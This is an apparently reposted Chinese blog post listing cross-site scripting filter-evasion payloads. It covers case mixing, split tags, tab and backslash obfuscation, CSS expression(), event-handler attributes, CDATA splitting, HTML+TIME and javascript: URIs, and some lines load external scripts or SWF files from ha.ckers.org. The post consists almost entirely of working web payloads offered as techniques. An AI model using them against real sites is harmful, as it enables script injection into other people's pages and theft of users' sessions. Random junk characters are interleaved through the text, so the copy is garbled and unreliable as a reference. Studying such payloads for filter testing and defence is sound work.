Cross Site Scripting(XSS)攻击手法介绍

admin

1. 改变字符大小写

$ e/ c: ?1 O+ I. {4 g: }
0 n% k% x+ M* [( A
    <sCript>alert(‘d’)</scRipT>
0 {9 K5 O) v& V) \
9 Z' Z  }6 Z* R+ |2. 利用多加一些其它字符来规避Regular Expression的检查
: c: ^- J  B! C, @: A) |
    <<script>alert(‘c’)//<</script>
2 J# o( z& t0 \3 j5 Q0 q
2 }# O5 P  l, F" v, S. G4 X; Z, U8 m3 ^    <SCRIPT a=">" SRC="t.js"></SCRIPT>

+ y- {- c9 @$ F1 O+ Z# G% n$ k    <SCRIPT =">" SRC="t.js"></SCRIPT>
. l+ d/ a- M2 L4 j0 \9 U
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>

5 o! m( ?: n3 Y. U6 z( m    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>

  g" f3 W4 _: a. ?+ E" h& t! f& H    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>

3. 以其它扩展名取代.js

    <script src="bad.jpg"></script>

% {$ c+ {5 C: N/ `# J, E4. 将Javascript写在CSS档里
; j, p! T! r+ f+ ]
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

- ?& ], u0 u7 Y       example:

          body {

0 c0 J5 m) E3 G$ s) J               background-image: url(‘javascript:alert("XSS");’)
1 x( @3 f; Z1 c3 \
          }
8 y0 t6 G' X, U: ?+ b! {  W
' [* T; h; Z' a4 k1 F5. 在script的tag里加入一些其它字符

    <SCRIPT/SRC="t.js"></SCRIPT>
1 T/ L. s1 Y# e, B
. z' A: q; s. U  q) X# {    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. 使用tab或是new line来规避
* r* \* _! n4 r) j% C7 E
    <img src="jav ascr ipt:alert(‘XSS3′)">
; l  q$ I. A  t' G9 m1 S
( Q/ q5 q4 o) V. i+ l; g1 e* g    <img src="jav ascr ipt:alert(‘XSS3′)">

    <IMG SRC="jav ascript:alert(‘XSS’);">

         -> tag

         -> new line

7. 使用"\"来规避
! w) O2 `  v& @* Q0 H
, l3 A* ^. ^# x5 L1 m: P    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>

# D9 ^( p4 u* |' J; l7 k' c    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
, |' N/ e4 b  e4 J/ A6 Y
: L( _' }) ^( ]9 D" P& w8 o! c    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
, r- ]/ |5 l. L$ i) Z
6 L, V$ y' d- c: c: }, C& l    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
1 n3 U  V/ `1 h0 b( f3 h6 s/ A
9 |/ `2 b$ ]  E    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
* J' R8 l2 z9 E, X! _: Q0 ~8 W2 s
+ h! e1 c7 p/ V, M' A+ t. n+ m  \8. 使用Hex encode来规避(也可能会把";"拿掉)
: Z" Z8 b4 h9 X; G4 U
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 H) o) K4 o$ U3 T) A
; W" d# Q# ?; J; M+ Q% D        原始码：<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
1 }0 R5 N! Z& N9 f
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

        原始码：<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

  U" ], x9 i8 a3 M4 R9. script in HTML tag

/ x, B$ E- ?& C+ H- I) A# X    <body onload=」alert(‘onload’)」>
2 F9 j* o5 s, t' Z) `* D
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
  j, J1 E9 {5 E+ I$ V+ P
  L; n$ w; T3 n9 b- e% b10. 在swf里含有xss的code
0 O$ W9 L9 s9 {9 ~
9 b7 E4 `8 L  U, l: U: R    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
- t2 {  v5 T3 S) L, P. C
; H3 C( O) b1 ^. T11. 利用CDATA将xss的code拆开，再组合起来。
8 X% L- b/ Q) F1 _2 t
( J, @% h; c7 p0 c' I5 i9 F; j* B! W    <XML ID=I><X><C>
- [2 i2 p; ^5 ~1 L* R9 `8 u+ F/ k/ V
4 J3 r/ f" z3 y$ A, g9 D! i8 f    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
* v: `8 }4 h% M( R
4 d* d& O( D6 z4 ^4 t6 I    </C></X>

7 n8 Y7 R0 v& a" S7 Z    </xml>
6 |% E, ]4 K+ T- W) ~+ r8 O4 l6 }
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
3 s& b0 w* U% }0 ?
; a9 S( d% {' c# z8 W  Z" V    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
& Z$ m+ P9 F# [* A/ ~% t6 I
  K4 Y7 c4 j5 m/ x0 O" ?" G    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
, x4 f; h" y$ _
12. 利用HTML+TIME。

2 C2 K3 m* p1 K    <HTML><BODY>
" }8 y+ B2 K' x
5 ~2 R* ]" L- C+ p6 n, s    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

$ Z0 m0 V3 a/ i( B) [9 d3 p/ r    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
" W  _; K9 X- h. y1 z- m0 j5 K
) Y1 b. ^* V8 I# i4 ^" c& Z+ {2 v6 G    </BODY></HTML>

- h& D3 o- R1 Y: e: q4 y4 u9 i13. 透过META写入Cookie。
, l& U' P+ Z" F3 Q3 v
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
/ e7 I# T1 n# L. A5 w1 a1 B
# N' g; H( n' ]! E14. javascript in src , href , url

    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
. w9 ?* ^' b. u+ N" u. h
7 L& @# `4 X  R. x    <img src="javascript:alert(‘XSS3′)">

; J8 h4 V2 l! T( @<IMG DYNSRC="javascript:alert(‘XSS20′)">

* _# p" G4 C% q/ k4 a: }5 q    <IMG LOWSRC="javascript:alert(‘XSS21′)">

    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
) d) n  V0 r  S
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
7 f" V( [9 w6 h
0 f$ E8 C' C; E0 X1 M( u, p% ~+ k    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">

5 Z, x1 c9 Y5 W: l% I, f    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
1 r# J! U! p+ ?3 I' B0 L! w) a& N
& O' o$ ?8 v% s6 q0 L' x    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
5 O' i8 Y9 ?- ^6 N
    </STYLE><A CLASS=XSS></A>
$ C2 d2 U( n$ {1 `" k& {2 a( u
; s) o1 d' s9 M2 Z6 V$ T    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>